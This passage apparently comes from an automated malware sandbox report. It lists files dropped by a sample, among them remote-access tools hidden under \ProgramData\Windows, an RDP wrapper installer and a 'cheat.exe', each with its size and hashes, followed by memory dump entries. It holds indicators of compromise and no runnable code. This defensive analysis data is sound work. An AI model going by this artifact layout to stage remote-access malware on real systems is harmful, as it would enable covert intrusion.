4.5MB

MD5
87b45cfb9f62dd793f0ac86b8b7940e5

SHA1
6245b453590748a48c4e6c29f391c2189ff657a2

SHA256
df3cd1545ce80e880c687a4ae4dc0846c41aaa32115029c88b6297580a89ab17

SHA512
332f4c66b5a4324aeccf3ee337ee34b2e764704e528b29657c4b6628565a5898c35b2c49cd2881090ac0b770537e6fe0a4516cb072b63fccca1c2a0fc948d196

Download Submit
\ProgramData\Windows\rfusclient.exe

Filesize
1.5MB

MD5
b8667a1e84567fcf7821bcefb6a444af

SHA1
9c1f91fe77ad357c8f81205d65c9067a270d61f0

SHA256
dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

SHA512
ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

Download Submit
\ProgramData\Windows\rutserv.exe

Filesize
1.7MB

MD5
37a8802017a212bb7f5255abc7857969

SHA1
cb10c0d343c54538d12db8ed664d0a1fa35b6109

SHA256
1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

SHA512
4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
705e63ba28d331a481a5e9833c67d426

SHA1
22ed4fd1fb0f2fd7e93d0517667c8876af5d004c

SHA256
a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7

SHA512
dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
705e63ba28d331a481a5e9833c67d426

SHA1
22ed4fd1fb0f2fd7e93d0517667c8876af5d004c

SHA256
a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7

SHA512
dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
705e63ba28d331a481a5e9833c67d426

SHA1
22ed4fd1fb0f2fd7e93d0517667c8876af5d004c

SHA256
a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7

SHA512
dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f

Download Submit
\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
705e63ba28d331a481a5e9833c67d426

SHA1
22ed4fd1fb0f2fd7e93d0517667c8876af5d004c

SHA256
a55d1809ec80b41d510186eddd9bb4e787c9a1f1460418eaed2a61bfbfa5d1e7

SHA512
dcc8d749dd632dfae7f2b63e075485a6bfde7d811bff0c10dd2f6b78e9b7b7a94926a0c558f0d4fb4c8cf04e74be9ccbfeddc533693dcddea879b2ca9d70bb3f

Download Submit
\ProgramData\install\cheat.exe

Filesize
5.0MB

MD5
649fffd458564e27e667966bbacbb317

SHA1
b9763307a07d118b0c154a902798a28f86198f46

SHA256
379c3bec90e398de37068154110dd85d853e8ec94d1384ac09235d00b76fc62b

SHA512
04c8f2ccc101b29b352618ff6ee436411779325a7236a45cc451940c1870d53cc7258e7b66dc33bc19dc9fbb9404f9328064578a04aa152f69819f82e9ef9b89

Download Submit
\rdp\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
\rdp\Rar.exe

Filesize
370KB

MD5
2e86a9862257a0cf723ceef3868a1a12

SHA1
a4324281823f0800132bf13f5ad3860e6b5532c6

SHA256
2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

SHA512
3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

Download Submit
memory/316-135-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/316-142-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/316-194-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/316-140-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/316-138-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/316-136-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1192-96-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1192-94-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1192-112-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1192-93-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1192-97-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1192-92-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1320-199-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1320-203-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1320-201-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1320-209-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1320-205-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1632-152-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1632-151-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1632-155-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1632-159-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1632-157-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/1712-244-0x000007FEFBFC1000-0x000007FEFBFC3000-memory.dmp

Filesize
8KB

Download
memory/1988-202-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1988-204-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1988-208-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1988-210-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1988-200-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/1992-54-0x00000000768D1000-0x00000000768D3000-memory.dmp

Filesize
8KB

Download
memory/2020-128-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-123-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-119-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-125-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-124-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2020-121-0x0000000000400000-0x0000000000AB9000-memory.dmp

Filesize
6.7MB

Download
memory/2636-225-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/2636-224-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/2636-223-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/2636-218-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/2636-226-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download
memory/2636-221-0x0000000000400000-0x00000000009B6000-memory.dmp

Filesize
5.7MB

Download